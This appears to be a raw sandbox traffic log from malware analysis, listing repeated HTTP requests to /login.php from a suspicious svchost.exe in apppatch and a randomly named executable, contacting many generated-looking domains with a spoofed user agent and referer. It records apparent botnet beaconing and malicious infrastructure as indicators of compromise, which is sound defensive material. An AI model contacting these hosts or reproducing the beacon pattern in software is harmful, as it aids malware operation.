Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731344868.1489616
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731344868.1489616
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Source: HTTP traffic: GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
